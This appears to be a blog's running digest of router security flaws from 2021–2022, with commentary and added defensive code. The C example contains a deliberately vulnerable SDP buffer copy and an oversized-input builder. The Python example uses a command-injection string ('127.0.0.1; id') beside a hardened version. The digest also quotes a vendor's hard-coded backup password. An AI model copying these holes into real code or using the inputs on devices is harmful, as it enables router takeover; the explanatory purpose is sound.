Cisco won’t fix authentication bypass zero-day in EoL routers
by Sergiu Gatlan of BleepingComputer September 7, 2022
We have seen this exact same thing twice before. Three strikes and you're out. Quoting: "Cisco says that a new authentication bypass flaw affecting multiple small business VPN routers will not be patched because the devices have reached end-of-life (EoL). This zero-day bug (CVE-2022-20923) is caused by a faulty password validation algorithm that attackers could exploit to log into the VPN on vulnerable devices..." Buggy routers are the RV110W, RV130, RV130W, and RV215W. Cisco says to buy a new router. I agree. Any brand but theirs.
AUGUST 2022
Another wide ranging flaw
Exploit out for critical Realtek flaw affecting many networking devices
by Ionut Ilascu of Bleeping Computer August 16, 2022
This is a doozy affecting many devices including routers and access points. The bug is in the Realtek SDK, specifically the SIP ALG function that rewrites SDP data, which has a stack-based buffer overflow. Bad guys can remotely execute code without authentication, or just crash a vulnerable device. There is no defense on a buggy device and no easy way to tell if a device is vulnerable. The flaw is identified as CVE-2022-27255. Either there is updated firmware or it will be vulnerable forever. Routers with no open ports can be hacked. Routers that do not expose Remote Management can be hacked. Realtek issued a bug fix in March 2022, so devices made afterwards should be safe, provided the device maker actually rebuilt its firmware with the patched SDK. The bug was detailed at the DEFCON conference by cybersecurity company Faraday Security. It is unclear how many networking devices use RTL819x chips but the RTL819xD version of the System on a Chip is in products from more than 60 vendors, including ASUSTek, Belkin, Buffalo, D-Link, Edimax, TRENDnet, Zyxel, Tenda, Hikvision, Rockspace, Nexxt, Keo and others. The bug will likely affect routers the most, but some IoT devices may also be affected. Buggy devices run the open-source eCos operating system which, as these things go, is pretty low end. It has no virtual memory and no concept of privileges. Every thread can access every memory location.
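Added C example, not the Realtek SDK, of the bug class described here (and of the pre-authentication buffer overflows that fill the Netgear list above): a SIP ALG pulling the media address out of the SDP "c=" line, first with an unbounded copy into a fixed stack buffer, then with the length and character checks a rewrite function needs before it touches the address. Both SDP bodies are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Realtek SDK code. A SIP ALG has to find the media
 * address in the SDP "c=" line so it can rewrite it for NAT. Both SDP
 * bodies here are constructed. */

static const char SDP_OK[] =
    "v=0\r\n"
    "o=- 1 1 IN IP4 192.168.1.10\r\n"
    "c=IN IP4 192.168.1.10\r\n"
    "m=audio 4000 RTP/AVP 0\r\n";

/* Writes an SDP whose address token is 200 bytes long. Returns its length. */
static size_t build_oversized_sdp(char *buf, size_t n)
{
    const char head[] = "v=0\r\nc=IN IP4 ", tail[] = "\r\n";
    size_t pad = 200;
    if (n < sizeof head - 1 + pad + sizeof tail)
        return 0;
    size_t len = sizeof head - 1;
    memcpy(buf, head, len);
    memset(buf + len, '1', pad);
    len += pad;
    memcpy(buf + len, tail, sizeof tail);     /* includes the NUL */
    return len + sizeof tail - 1;
}

/* Vulnerable pattern: a fixed stack buffer sized for a dotted quad and a
 * copy whose length is whatever the packet says. With the oversized SDP
 * the copy runs past addr[] and over the saved return address. It is only
 * ever called with SDP_OK in this file. */
static int sdp_conn_addr_unsafe(const char *sdp, char *out)
{
    const char *c = strstr(sdp, "c=IN IP4 ");   /* also assumes NUL termination */
    if (!c)
        return -1;
    char addr[16];                               /* "255.255.255.255" + NUL */
    c += 9;
    size_t len = strcspn(c, "\r\n");
    memcpy(addr, c, len);                        /* BUG: len is attacker-controlled */
    addr[len] = '\0';
    strcpy(out, addr);
    return 0;
}

/* Hardened: the search is bounded by the buffer length, the token must be
 * at the start of a line, its length is checked against what a dotted
 * quad can be (7..15 bytes) and against the destination, and its
 * characters are validated before the address is used for rewriting. */
static int sdp_conn_addr_safe(const char *sdp, size_t sdplen, char *out, size_t outlen)
{
    static const char key[] = "c=IN IP4 ";
    const size_t klen = sizeof key - 1;
    const char *end = sdp + sdplen, *c = sdp;

    for (;; c++) {
        if ((size_t)(end - c) < klen)
            return -1;                           /* no c= line: reject the message */
        if ((c == sdp || c[-1] == '\n') && memcmp(c, key, klen) == 0)
            break;
    }
    c += klen;
    size_t len = 0;
    while (c + len < end && c[len] != '\r' && c[len] != '\n')
        len++;
    if (len < 7 || len > 15 || len >= outlen)
        return -1;
    int dots = 0;
    for (size_t i = 0; i < len; i++) {
        if (c[i] == '.')
            dots++;
        else if (c[i] < '0' || c[i] > '9')
            return -1;
    }
    if (dots != 3)
        return -1;
    memcpy(out, c, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char addr[16], evil[256];
    size_t n = build_oversized_sdp(evil, sizeof evil);

    sdp_conn_addr_safe(SDP_OK, sizeof SDP_OK - 1, addr, sizeof addr);
    printf("benign SDP  -> %s\n", addr);
    printf("oversized   -> %d (-1 = rejected, nothing copied)\n",
           sdp_conn_addr_safe(evil, n, addr, sizeof addr));
    return 0;
}
```

On eCos, with no memory protection and no privilege separation as noted above, there is nothing after the overflow to contain it, so the bounds check is the whole defense.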
At this point, you could not pay me to use a Cisco router
Critical flaws found in four Cisco SMB router ranges - for the second time this year
by Simon Sharwood of The Register August 5, 2022
For the second time this year, Cisco small business routers have critical flaws. Three flaws this time. The buggy models are the RV160, RV260, RV340, and RV345 Series.
All three bugs have the same underlying problem, the programmers that work for Cisco are lazy. Put another way, each flaw is due to insufficient input validation. Two of the bugs are critical and a remote bad guy who does not know any passwords can totally take over the routers. Patches are available but the safest approach is to switch router vendors.
DrayTek routers have a critical flaw
Critical RCE vulnerability impacts 29 models of DrayTek routers
by Bill Toulas of Bleeping Computer August 4, 2022
This is the second critical security flaw in DrayTek routers that I am aware of. The bug is a Remote Code Execution flaw with a CVSS v3 severity score of 10 (out of 10). In other words, it is as bad as bad gets. Remote attackers can completely take over vulnerable routers. The flaw is a buffer overflow in the web-based management interface. The bug can be exploited both on the WAN/Internet side and on the LAN side. Bug fixes are available.
JULY 2022
Arris bugs show the company's true personality
Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
by Derek Abdine July 29, 2022
There are three different bugs in the muhttpd software that runs the web administration portal. One of the bugs is critical, two are somewhat impractical to exploit. The buggy muhttpd software is used in both Arris router products and whitelabel/OEM products by other vendors. The bug has been confirmed in Arris router models NVG443, NVG599, NVG589, NVG510, as well as ISP-customized variants such as BGW210 and BGW320. Here is the bigger issue: "The complete list of affected products is unknown as Arris has declined to comment on the affected product list." Lesson learned, we don't want any products from Arris. The most severe vulnerability allows unauthenticated path traversal from the root of the file system as the root user. This exposes a whole host of sensitive information. The muhttpd software was patched in June 2022. Prior to that the last release of the software was in 2010. Arris is content to use software that had not been updated in 12 years. The path traversal bug appears to be present in the initial release of the muhttpd software in 2006. If the web portal is not available on the WAN side, the critical bug can not be exploited remotely. However, it can still be exploited on the LAN side. This is another reason for VLANs, as they let us limit which devices can see the router on the LAN side. The Security Checklist page lists some other LAN side protections that block users/devices from getting at the router.
JUNE 2022
Throw away old Cisco small business routers
If you're using older, vulnerable Cisco small biz routers, throw them out
by Jessica Lyons Hardcastle of The Register June 16, 2022
Cisco can not be shamed into fixing old buggy routers. A critical vulnerability exists in the web-based management interface of the Cisco RV110W, RV130, RV130W, and RV215W routers. These models went End of Life back in 2019. The bug is CVE-2022-20825 and it is due to insufficient user input validation of incoming HTTP packets. In other words, lazy programmers. In addition, there is a critical vulnerability in Cisco enterprise security appliances that could allow a remote bad guy to log in to the web management interface. This bug they will fix.
MAY 2022
Well, this is new
Two business-grade Netgear VPN routers have security vulnerabilities that can't be fixed
by Zeljka Zorz of Help Net Security May 20, 2022
Quoting: "Netgear has admitted that multiple security vulnerabilities in its business-grade BR200 and BR500 VPN routers can't be fixed due to technical limitations outside of their control, and is offering users a free or discounted replacement router." Netgear does not offer details of the vulnerabilities, which were reported by Joel St. John of IncludeSecurity. To exploit the bug(s) the router administrator would have to be logged on to the router while they visited a malicious website. Advice about this has been on the home page of this website for years.
Paying lots of money does not get you security
Hackers are exploiting critical bug in Zyxel firewalls and VPNs
by Ionut Ilascu of BleepingComputer May 15, 2022
Jake Baines of Rapid7 discovered a bug in assorted Zyxel devices. Fixes are available. The bug was serious enough that the NSA warned Zyxel customers to patch immediately. These devices are supposed to provide security. The bug is CVE-2022-30525 and the buggy devices are the USG FLEX series, the ATP series, and the USG20-VPN/USG20w-VPN. The bug lets bad guys inject arbitrary commands remotely without authentication. One thing bad guys can do with this is to set up a reverse shell. The bug was due to un-sanitized URI input (sound familiar?) being fed into the os.system method. Rapid7 reported that there are over 15,000 vulnerable devices online. Shadowserver found over 20,000 Zyxel firewall models on the Internet that are potentially affected by the bug.
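The bug class just described, a URI parameter pasted into a shell command string, side by side with the input-validation and no-shell pattern that prevents it. This is an added illustration, not Zyxel's code; the "ping a host" feature and the function names are hypothetical.

```python
import ipaddress
import re
import subprocess

# Hypothetical router feature: "ping this host" with the host taken from a
# request URI. Constructed to show the bug class, not any vendor's code.

HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def vulnerable_command(host: str) -> str:
    """The weak pattern. Returns the exact string that os.system() would hand
    to /bin/sh, so shell metacharacters in `host` become part of the command."""
    return f"ping -c 1 {host}"


def is_valid_host(host: str) -> bool:
    """Allowlist check: accept an IPv4/IPv6 literal or a plain DNS name.
    Everything else (spaces, ';', '$(', '|', backticks, ...) is refused."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(host) is not None


def hardened_argv(host: str) -> list:
    """Validate first, then build an argument vector. With a list and
    shell=False there is no shell left to interpret metacharacters."""
    if not is_valid_host(host):
        raise ValueError(f"refusing to ping {host!r}: not a host name or IP")
    return ["ping", "-c", "1", host]


def run_hardened(host: str, timeout: float = 5.0) -> int:
    """Run the validated command without a shell; returns ping's exit status.
    Needs a ping binary, so the offline checks only exercise the builders."""
    return subprocess.run(hardened_argv(host), shell=False,
                          capture_output=True, timeout=timeout).returncode


if __name__ == "__main__":
    # Constructed request parameter of the kind the article describes.
    tainted = "127.0.0.1; id"
    print("shell would see:", vulnerable_command(tainted))  # ping -c 1 127.0.0.1; id
    print("passes validation:", is_valid_host(tainted))     # False
```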
APRIL 2022
Yet another buggy router
Security audit of the SKYWORTH GN542VF router – how to hack the admin panel password without leaving the web browser!
by Alexey Miloserdov April 5, 2022
The router is somewhat unusual. Each one ships with a unique password. The password is displayed on the login web page, but only if you are on the LAN side, not when you log in from the WAN side.
When someone logs in with the correct password from the WAN side, the router shows an error message. Sounds good, at first. However, the password is always in the login page and it is only hidden using JavaScript that can be easily manipulated with developer tools built into the web browser. And, while it does display an error when someone logs in from the WAN side, it nonetheless logs the person in. The error message is a scam. I don't know what country or ISP uses this router.
MARCH 2022
You can't make this up - another Zyxel critical bug
Zyxel urges customers to patch critical firewall bypass vulnerability
by Charlie Osborne of ZDNet April 1, 2022
A critical vulnerability in Zyxel firewall software has just been fixed. Buggy devices include their USG, ZyWALL, USG FLEX, ATP, VPN and NSG. The company has fixed "products that are within their warranty and support period" and did not say anything about older devices that may also be vulnerable. The bug is due to "the lack of a proper access control mechanism". Words with no meaning. The bug lets a bad guy bypass authentication and obtain administrative access. In other words, it is as bad as bad gets. The bug is CVE-2022-0342.
FEBRUARY 2022
Many Zyxel routers are buggy as heck
Multiple Critical Vulnerabilities in multiple Zyxel devices
by G. Hechenberger, S. Robertz, S. Viehböck and T. Weber of SEC Consult February 15, 2022
"Multiple Zyxel devices are prone to different critical vulnerabilities resulting from insecure coding practices and insecure configuration." All told, SEC Consult found eight different types of bugs. The bugs included: multiple unauthenticated buffer overflows, two unauthenticated Local File Disclosures (which let bad guys read all files), Unsafe Storage of Sensitive Data and a couple of command injection flaws.
Not enough? They also found that Zyxel fails to use OS level protection mechanisms like PIE, stack canaries and relocation read-only (RELRO). SEC Consult offered no workarounds (really?). They also failed to say which, if any, of the bugs can be exploited from the WAN side, as those are obviously more dangerous than bugs that are exploitable from the LAN side only. There are fixes for some, not all, devices. Many devices will not be fixed as they are too old to bother with (EoL). Some other devices will get their bug fixes in September 2022. The timeline shows that Zyxel took over a year before they issued fixes. I am told that Zyxel consumer routers are popular in Europe, especially in the UK. The UK popularity stems from their use of Broadcom chipsets that provide a very stable VDSL2 connection over old copper wire that is prone to line noise.
Yet again, critical security flaws in Cisco routers
Cisco inferno: Networking giant reveals three 10/10 rated critical router bugs
by Simon Sharwood of The Register February 4, 2022
Cisco reminds me of the Wizard of Oz. Seemingly great and powerful on the outside, but inside a dumpster fire of disgracefully buggy software. The buggy hardware this time are the RV160, RV260, RV340 and RV345 products. Cisco revealed that there are 15 bugs, but a handful are brutal - as bad as bad gets. Some of the bugs are fixed, but not all.
JANUARY 2022
Here we go again, another bug in NetUSB affects many routers
Millions of Wi-Fi routers vulnerable to hacker attack — what you need to do
by Paul Wagenseil of Tom's Guide January 11, 2022
Consumer routers are buggy enough without also expecting them to share assorted devices plugged into their USB ports. Software that enables this sharing, NetUSB, was found to be buggy back in May 2015. NetUSB is used in many routers. Which ones? None of your business. Back in 2015, there were 26 router vendors thought to be using NetUSB. Sometimes NetUSB can be disabled via the router web interface, sometimes not. This bug is a buffer overflow and, fortunately, is hard to exploit. NetUSB opens port 20005 on the LAN side of the router. Perhaps most worrying is that some routers are double buggy and open port 20005 on the WAN/Internet side also. If so, the router can be sent commands directly, as NetUSB does not do authentication.
The creator of NetUSB, KCodes, was told of the buffer over-run on Sept. 9, 2021, and a patch was issued on Oct. 4th. Netgear routers, the D7800, R6400v2 and R6700v3 were patched on Dec. 20, 2021. Other vendors that license NetUSB, Edimax, D-Link, Tenda, TP-Link and Western Digital have done nothing. D-Link is looking into it. Great reason to avoid TP-Link.
DECEMBER 2021
Bugs in the Netgear Nighthawk RAX43
Netgear Nighthawk RAX43 Multiple Vulnerabilities
by Evan Grant, Jimi Sebree of Tenable December 30, 2021
The bugs are in firmware version 1.0.3.96 which was the latest as of December 28, 2021. This article is dated the 30th and Netgear claims to have released new firmware on the 29th. Just like the below group of bugs with the R6700, some of which were fixed in 90 days. What bugs did Netgear fix? None of your business. Not what you want in a router vendor. Like the R6700, this router also uses HTTP by default for its web interface, saves passwords in plain text, includes old buggy jQuery libraries, includes a vulnerable version of the minidlna service and has insufficient UART protection mechanisms. But, that's not all. Configuration backups are encrypted with a hard-coded password (RAX50w!a4udk). And two bugs can be combined. The first is a buffer overrun, the second, command injection. Together someone can perform remote tasks as root, without authentication. As with the Tenable report below, this one too, does not make it clear which, if any, bugs can be exploited from the WAN side and under what circumstances.
Bugs in the Nighthawk R6700 that Netgear handles poorly
Netgear leaves vulnerabilities unpatched in Nighthawk router
by Bill Toulas of Bleeping Computer December 31, 2021
Cybersecurity company Tenable found six high-risk vulnerabilities in the latest firmware version (1.0.4.120) for the Netgear Nighthawk R6700v3 router. They notified Netgear of the bugs on Sept 30, 2021 and by Dec 30th had heard nothing back from Netgear about any possible fixes. So, they went public with the details. Not what you want from your router vendor. The bugs could let an attacker on the LAN side take complete control of the router. The danger from the WAN side is not clear. One easily understood issue is that insecure HTTP is used by default on communications to/from the device’s web interface. Also, passwords are stored in plain text. In addition to the six bugs, Tenable also found instances of a common problem with routers - the firmware includes old software with known bugs. Specifically, they found several instances of jQuery libraries relying on version 1.4.2 and they found an old buggy version of the MiniDLNA server software. Taking a step back, hardware versions 1 and 2 of this router are too old to fix (End of Life is the official buzzword) so Tenable only examined hardware version 3. Interesting wrinkle, Netgear released a new firmware for this router pretty much at the same time as Tenable went public with the bugs. What did Netgear fix? None of your business. Not what you want from your router vendor.
Consumer routers prove my point, yet again
Nine WiFi routers used by millions were vulnerable to 226 flaws
by Bill Toulas of Bleeping Computer December 2, 2021
This is not the first time an examination of multiple routers has found a huge number of bugs. In this case, nine routers yielded 226 bugs. All were current models running the latest firmware. The routers were from Asus, AVM, D-Link, Netgear, Edimax, TP-Link, Synology, and Linksys. The automated system used to find these bugs only looks for known flaws. The underlying issue is old software that is not upgraded when fixes are made. The TP-Link Archer AX6000 was the worst router, with 32 flaws. The Synology RT-2600ac, which I hated, had 30 bugs. The best router had 18 bugs. The research was done by IoT Inspector, in collaboration with German IT magazine CHIP. They also found a way to send malicious firmware to the D-Link DIR-X1560. Most of the reported bugs have been fixed. Not said, is whether the fixes were for the one tested model or for all similar models. No one ever dwells on that. Also, the fixes were not tested to ensure they really fix the problems.
Netgear again
Thousands of Netgear Wi-Fi routers need to be patched now - here's how
by Paul Wagenseil of Tom's Guide December 3, 2021
I think Paul is re-using his headlines at this point :-) Not the biggest flaws in the world. What stands out to me is that the bugs were first disclosed to Netgear on May 3, 2021. Long time ago. Buggy devices include 35 different models of routers, Wi-Fi range extenders and combination modem-routers. The bugs were found by British security firm Immersive Labs.
NOVEMBER 2021
If there was ever a case to be made about not using an ISP router, this is it
Six million Sky routers had serious security flaw
by Jane Wakefield of the BBC November 19, 2021
Quoting: "About six million Sky routers had a significant software bug that could have allowed hackers to take over home networks ... The problem has been fixed - but researchers say it took Sky 18 months to address.". Sky is one of the biggest ISPs in the U.K. The bug was in four Sky Hub models and 2 Booster models. The problem was with DNS rebinding and a malicious web page, anywhere on the Internet, could exploit the flaw. Most of these routers shipped with a default password which is never good. Better routers make you pick a new password at first boot. Anyone who changed the password was safe. It is not clear to me, after reading the report, if changing the internal IP address of the router offers protection from this attack. Final insult: Sky would not maintain communication with the company that found and reported the flaw, Pen Test Partners.
Still more Netgear bugs
Netgear patches severe pre-auth RCE in 61 router and modem models
by Catalin Cimpanu of The Record November 17, 2021
A bug with UPnP lets devices connected to the router hack the router without knowing the password. A LAN side device can get Remote Code Execution as root on a buggy router. Perhaps most importantly, this is the fifth major set of remote code execution bugs that Netgear has needed to patch this year. Other remote takeover bugs were found in March (by NCC Group), June (by Microsoft), September (by Polish security researcher Gynvael Coldwind) and also in September (by GRIMM). One defense, not mentioned in the article, is to limit the LAN side devices that can communicate with the router. This is always a good idea. On some of the buggy routers, the bug cannot be exploited. Why not? The fix for an earlier bug broke the UPnP SUBSCRIBE and UNSUBSCRIBE functions. Netgear fixed the latest bug in some of their routers but old ones (EoL or End of Life) were not fixed.
Routers are sitting ducks for hackers
PWN2OWN Austin 2021
by Dustin Childs of Zero Day Initiative November 1, 2021
Three routers were targeted at a recent hacking contest and they all were successfully hacked.
The Cisco RV340 router was successfully attacked three times from the WAN/Internet side and six times from the LAN side. A software cesspool, it is. In the very definition of irony, the web page for the RV340 says "Connect Your Network Safely and Securely" Ha.
SEPTEMBER 2021
SonicWall has holes in its wall
SonicWall warns users to patch critical vulnerability as soon as possible
by Pieter Arntz of MalwareBytes September 24, 2021
SonicWall specializes in securing networks but a critical bug makes them less secure. The bug is in the SMA 100 series of devices, specifically the SMA 100, 200, 210, 400, 410, and 500v. Details:
"... the vulnerability is an improper access control ... [that] allows a remote unauthenticated attacker to bypass path traversal checks and delete an arbitrary file. Which, if the attacker knows what they are doing, can potentially result in a reboot to factory default settings. With the default settings in place the attacker can gain administrator privileges by using the factory default credentials."
Patches are available. The patches also include fixes for two other less critical bugs, a local privilege escalation flaw, and a denial-of-service vulnerability.
Fixes available for buggy Netgear routers
Netgear fixes dangerous code execution bug in multiple routers
by Sergiu Gatlan of Bleeping Computer September 21, 2021
Adam Nichols of GRIMM discovered a bug in the Circle parental control service on these Netgear routers: R6400, R6700, R6900, R7850, R7900, R8000 and RS400. If you have a Netgear router, beware of their marketing. Paul Wagenseil warns "Because Netgear markets its home routers using somewhat misleading terminology - for example, the R7000 is also labeled as the 'Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router' - you might want to flip your router over and check the sticker on the bottom for the real model name." If the Circle software is installed, the router is vulnerable. The bug is in the Circle update routine which runs as root. Wagenseil offers perspective on this: "The problem is in the Disney-designed Circle parental-control feature, which was rolled out to Netgear Nighthawk and Orbi mesh routers in 2017. The Orbis and newer Wi-Fi 6 Nighthawks got parental-control software built in-house by Netgear earlier this year, while the Circle service was discontinued for older Nighthawk models in late 2020." Updated firmware is available, but there are many steps to the manual update process. The bug is relatively hard to exploit as the bad guy must be able to intercept and modify the router's network traffic. Gatlan points out that earlier this month, Netgear fixed three severe security vulnerabilities impacting over a dozen of their smart switches, allowing bad guys to take over unpatched devices.
For two years, Virgin Media fails to fix a router bug
VPN users unmasked by zero-day vulnerability in Virgin Media routers
by Adam Bannister of Port Swigger September 20, 2021
Fidus Information Security, a UK penetration testing consultancy discovered a flaw in the Virgin Media Super Hub 3 router and reported it in October 2019. In February 2020 Fidus was asked not to publicly reveal the flaw until the first quarter of 2021. They agreed. Suckers. Virgin Media, and parent company Liberty Global, both stopped responding to Fidus. As of the end of September 2021, the bug is still not fixed. The flaw is that the router will reveal the public IP address to anyone on the LAN side that knows how to ask for it. To exploit this, Fidus uses DNS rebinding along with a malicious DNS server for a malicious domain. Load a web page from that domain, and it can reveal the public IP address even when a VPN is being used. Not all VPNs, but many. Some do not allow access to LAN side devices, some do. A good VPN will offer a choice as there is no one right answer. The tested router is really the ARRIS TG2492 and Fidus believes the vulnerability probably works against all related models. Don't hold your breath for a comment from Arris.
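Both the Sky Hub and the Virgin Media Super Hub reports above come down to DNS rebinding: a malicious page makes the browser send requests to the router's LAN address. The two standard mitigations, shown here as an added example that is not code from Sky, Virgin Media, Arris or Pen Test Partners; the router addresses, names and ".lan" suffix are constructed.

```python
import ipaddress

# Address ranges a rebinding attack steers the browser to: the victim's LAN,
# loopback and link-local space (constructed list for this example).
LAN_NETS = tuple(ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
))


def _host_from_header(host_header: str) -> str:
    """Strip an optional port from a Host header; handles '[v6addr]:port'."""
    h = host_header.strip().lower()
    if h.startswith("["):                      # IPv6 literal in brackets
        end = h.find("]")
        return h[1:end] if end > 0 else ""
    if h.count(":") == 1:                      # name:port or v4addr:port
        h = h.split(":", 1)[0]
    return h


def host_header_allowed(host_header: str, own_addresses) -> bool:
    """Mitigation 1, on the router's own web server: answer only requests
    whose Host header names the router. A rebinding request arrives with the
    attacker's domain in Host, because that is the page the browser loaded,
    so the admin interface can refuse it before any handler runs."""
    h = _host_from_header(host_header)
    if not h:
        return False
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:                         # a name, compare case-insensitively
        return any(h == a.lower().rstrip(".") for a in own_addresses)
    for a in own_addresses:
        try:
            if ipaddress.ip_address(a) == ip:
                return True
        except ValueError:
            continue
    return False


def is_rebinding_answer(qname: str, answer_ip: str,
                        local_suffixes=(".lan",)) -> bool:
    """Mitigation 2, on the LAN's DNS forwarder (what dnsmasq's
    --stop-dns-rebind option does): drop upstream answers that map a public
    name onto a LAN address. Names under the local suffix are exempt because
    they legitimately resolve to LAN hosts."""
    ip = ipaddress.ip_address(answer_ip)
    if not any(ip in net for net in LAN_NETS):
        return False
    q = qname.rstrip(".").lower()
    return not any(q.endswith(s) for s in local_suffixes)


if __name__ == "__main__":
    router = ("192.168.0.1", "fe80::1", "router.lan")   # constructed identity
    print(host_header_allowed("192.168.0.1", router))     # True
    print(host_header_allowed("attacker.example", router))  # False
    print(is_rebinding_answer("attacker.example", "192.168.0.1"))  # True
```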
One TP-Link router is buggy as heck. What about others?
"Amazon’s Choice" best-selling TP-Link router ships with vulnerable firmware
by Edvardas Mikalauskas of CyberNews.com September 2, 2021
The bugs in this one router model are not important. What is important is that, no doubt, many other TP-Link routers share these bugs and only this one model will be fixed. TP-Link is hugely popular, the article reports they sell over 150 million devices annually. The article is about the TP-Link AC1200 Archer C50 (v6) router. On Amazon it is rated 4.5 stars (out of 5) with over 61,000 ratings. Just shows how security is not a concern. The article covers many bases. For one: "The router is shipped with outdated firmware that is vulnerable to dozens of known security flaws". Then too: "The default version of the router's web interface app suffers from multiple bad security practices and vulnerabilities, including clickjacking, charset mismatch, cookie slack, private IP disclosures, weak HTTPS encryption, and more." They list 13 different issues with the web interface which is surely shared by many TP-Link routers. There were other security problems too. As for known bugs in the shipping firmware, some of these are fixed in later versions of the firmware, however the router does not auto-update.
The researchers said that TP-Link responded quickly and plans on force-feeding the router a firmware update. As for the rest of the many TP-Link routers, this was not discussed. Par for the course.
AUGUST 2021
How low can Cisco go? Pretty low.
Cisco says it will not release software update for critical 0-day in EOL VPN routers
by Jonathan Greig of ZDNet August 27, 2021
Cisco to their customers: Yeah, it's a bug, but we are not going to bother fixing it because the routers are old. Go buy a new router.
Yet again, Cisco has been caught failing to validate input. Lazy, lazy, lazy. Again, again, again. This vulnerability is in the Universal Plug-and-Play (UPnP) service in their Small Business RV110W, RV130, RV130W, and RV215W routers. An unauthenticated attacker can execute arbitrary code or cause a vulnerable device to restart unexpectedly. The support page for the RV215W router says that the end of support date is November 30, 2024. Seems like they lied. And the links for EOL of the RV215W go here which says nothing at all about the RV215W. Cisco is really bad news.
More bugs that will never be fixed
Remote code execution flaws lurk in countless routers, IoT gear, cameras using Realtek Wi-Fi module SDKs
by Thomas Claburn of The Register August 16, 2021
There are vulnerabilities in three Realtek SDKs accompanying its Wi-Fi modules. This article says there are 4 bugs, the original report lists a dozen. The hardware is used in almost 200 products made by more than 65 vendors. Vendors selling the buggy hardware include: AsusTEK, Amped Wireless, Belkin, Buffalo, D-Link (many devices), Edimax, EnGenius, Huawei, Logitech, Netis, Technicolor, Tenda, TRENDnet, Zyxel and Netgear. The flaws require an attacker to be on the same network as the vulnerable device, or be able to reach it over the Internet. It is not clear if a VLAN offers any protection. Remote unauthenticated attackers (the worst kind) can fully compromise a device and execute code with the highest level of privilege.
One buggy device, the Realtek RTL819xD module, creates wireless access points. One estimate is that almost a million vulnerable devices may use the buggy software, including VoIP and wireless routers, repeaters, IP cameras, and smart lighting controls. Realtek will fix some of the bugs, others are in software that is too old to bother with. However, it is expected that most vulnerable devices will never be patched.
Fortinet falls down
Fortinet delays patching zero-day allowing remote server takeover
by Sergiu Gatlan of Bleeping Computer August 17, 2021
This is interesting, to me, not because of the delay in patching that is the focus of the article. Instead, I take note of the long list of security bugs in Fortinet software that is cited at the end of the article. It's pretty long. And, the fact that Fortinet clammed up and stopped responding to Rapid7 which found the latest bug. That is not acceptable.
Cisco bugs never cease. They are as inevitable as death and taxes
Cisco fixes critical, high severity pre-auth flaws in VPN routers
by Sergiu Gatlan of Bleeping Computer August 4, 2021
The web-based interfaces of these Cisco routers are buggy: RV340, RV340W, RV345, RV345P (Dual WAN Gigabit VPN routers), RV160, RV160W, RV260, RV260P, and RV260W (VPN routers). Yet again, the underlying problem is improperly validated HTTP requests and insufficient user input validation. Yet again. If remote access is disabled, then buggy devices are safe on the WAN side. There is no protection at all on the LAN side (the web interface can not be disabled), so the existing patches should be installed ASAP.
There are two bugs. Attackers without the password can trigger a denial of service condition or execute commands and arbitrary code.
Yet another widespread router flaw
Decade-long vulnerability in multiple routers could allow network compromise
by Jessica Haworth of Port Swigger August 4, 2021
Evan Grant of Tenable discovered an authentication bypass vulnerability in many routers and modem/routers manufactured by Arcadyan. The bug exists in at least 20 router models from 17 different vendors including Asus, Verizon, Vodafone, British Telecom, O2 (Telefonica), Orange, Hughesnet, Deutsche Telekom, Telstra and Telus. Was your router made by Arcadyan? None of the articles mentioned how you can tell. I have recent photos of a Verizon FIOS G3100 router and it certainly does not say Arcadyan anywhere on the outside. The important lesson here for consumer routers is that the vendor selling you the device is not necessarily the one who manufactured it. Grant also found two separate flaws in some Buffalo routers. This was the first time Grant had looked at a router for bugs and he said the flaws were "fairly easy to discover" and "trivial to exploit". The widespread bug is a path traversal flaw and is assigned CVE-2021-20090. The bug has been around for at least 12 years and can be exploited by unauthenticated, remote attackers. What is not said is whether the flaw can be exploited on routers that have Remote Administration turned off. My guess is no and that this fact was left out to make the bug seem more important. That said, I recently used a Verizon FIOS G3100 router and the user interface for Remote Administration was so miserably confusing I could not tell if I was turning it on or off.
UPDATE: Aug 25, 2021. I am told by a Verizon FIOS customer that there is new firmware, version 3.1.0.12, for the G3100 Router. The router self-updates. According to Joshua Lowcock it only self-updates, but he documented a work-around to force an update.
What changes are in this new release? None of your business, Verizon does not seem to keep a change log. However, the GUI for the Admin interface has changed dramatically, which can only be a good thing. Lowcock notes that the new firmware has a dedicated wireless network for IoT, offers control over each wifi antenna and has a new performance-mode tri-band setting. Nothing about a security bug fix. Way back when, Verizon kept using WEP a decade after it was known to be insecure, so I would not get my hopes up about bug fixes.
JULY 2021
Bugs in a D-Link router. Just one model? None of your business
D-Link issues hotfix for hard-coded password router vulnerabilities.
by Sergiu Gatlan of Bleeping Computer July 16, 2021
If hard-coded password backdoors do not turn you off D-Link, nothing will. A guy at Cisco, Dave McDaniel, took a look at the DIR-3040 router and found it to be a security nightmare. Multiple vulnerabilities: command injection, information disclosure and the biggie - executing arbitrary code. I am not surprised. I am also not surprised that the original report from Cisco and the article about it from Bleeping Computer focus exclusively on the DIR-3040. So too does D-Link. This is disgraceful. What about other similar routers with similar firmware? Clearly, that is none of our business. What should someone with a DIR-2640 or DIR-1950 do? Router vendors share firmware across multiple models. It is all but guaranteed that similar models have the same bugs. Anyone using a D-Link router clearly does not care about security. Still, Cisco says the bugs were fixed on July 13th but D-Link says on June 9th. Beats me.
A bad Summer for SonicWall
Another Brick in the Wall: eCrime Groups Leverage SonicWall VPN Vulnerability
by Heather Smith and Hanno Heinrichs of Crowdstrike June 8, 2021
There was a bug, SonicWall did not fix it completely and eventually bad guys exploited the heck out of it. Quoting Pieter Arntz: "In the continuous wave of ransomware attacks you may have noticed a trend where the software and devices that are designed to keep you safe, are being used to establish the opposite. This year we have seen Pulse Secure vulnerabilities exploited in the wild, CISA warnings about successful attacks targeting a number of years-old vulnerabilities, and the colossal Kaseya supply-chain attack, among others."
JUNE 2021
